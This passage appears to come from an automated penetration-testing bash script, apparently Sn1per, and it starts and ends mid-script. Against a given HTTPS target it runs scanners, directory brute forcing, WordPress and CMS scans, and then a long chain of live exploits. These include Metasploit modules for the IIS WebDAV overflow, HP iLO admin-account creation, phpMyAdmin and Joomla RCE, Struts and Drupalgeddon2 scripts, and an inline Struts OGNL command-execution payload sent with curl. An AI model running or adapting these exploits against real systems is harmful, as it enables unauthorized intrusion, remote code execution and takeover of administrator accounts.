sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
sslscan --no-failed $TARGET:$PORT | tee $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw > $LOOT_DIR/web/sslscan-$TARGET-$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET-$PORT.raw 2> /dev/null
echo ""
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ ${DISTRO} == "blackarch" ]; then
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
/bin/CutyCapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
cutycapt --url=https://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -sV -T5 -Pn -p $PORT --script=http-vuln* $TARGET
if [ "$PASSIVE_SPIDER" = "1" ]; then
if [ "$BURP_SCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$VERBOSE" == "1" ]; then
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}\"$RESET"
fi
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:$PORT\"]}"
echo ""
fi
if [ "$NMAP_SCRIPTS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
fi
if [ "$PASSIVE_SPIDER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
fi
if [ "$WAYBACKMACHINE" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
fi
if [ "$BLACKWIDOW" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
blackwidow -u https://$TARGET -l 3 -s y 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
blackwidow -u https://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
fi
if [ "$WEB_BRUTE_COMMON" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
fi
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET:$PORT --disable-tls-checks
echo ""
wpscan --url https://$TARGET:$PORT/wordpress/ --disable-tls-checks
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET:$PORT
echo ""
cmsmap https://$TARGET:$PORT/wordpress/
echo ""
if [ "$NIKTO" = "1" ]; then
if [ "$CLUSTERD" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
fi
if [ "$CMSMAP" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CMSMAP $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cmsmap https://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
echo ""
cmsmap https://$TARGET:$PORT/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
echo ""
fi
if [ "$WPSCAN" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
wpscan --url https://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
echo ""
wpscan --url https://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
fi
if [ "$NIKTO" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-$PORT.txt
nikto -h https://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-https-port$PORT.txt
fi
if [ "$SHOCKER" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --ssl --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
fi
if [ "$JEXBOSS" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
cd $INSTALL_DIR
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; set PATH /uploads/; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET:$PORT | head -n 1
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
ruby $INSTALL_DIR/bin/drupalgeddon2.rb https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/cisco-asa-traversal.py https://$TARGET:$PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JEXBOSS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
cd /tmp/
python /usr/share/sniper/plugins/jexboss/jexboss.py -u https://$TARGET:$PORT
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/gpon_rce.py https://$TARGET:$PORT 'whoami'
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u https://$TARGET:$PORT
if [ $SCAN_TYPE == "DOMAIN" ] && [ $OSINT == "1" ];
then
if [ -z $GHDB ];
then
if [ $OSINT == "0" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED SKIPPING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
else
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
goohak $TARGET > /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
rm -Rf output/ cookie.txt exploits.conf
fi
if [ "$METASPLOIT_EXPLOIT" == "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-hp_ilo_create_admin_account.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET--port80-badblue_passthru.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-phpmyadmin_3522_backdoor.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-joomla_comfields_sqli_rce.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
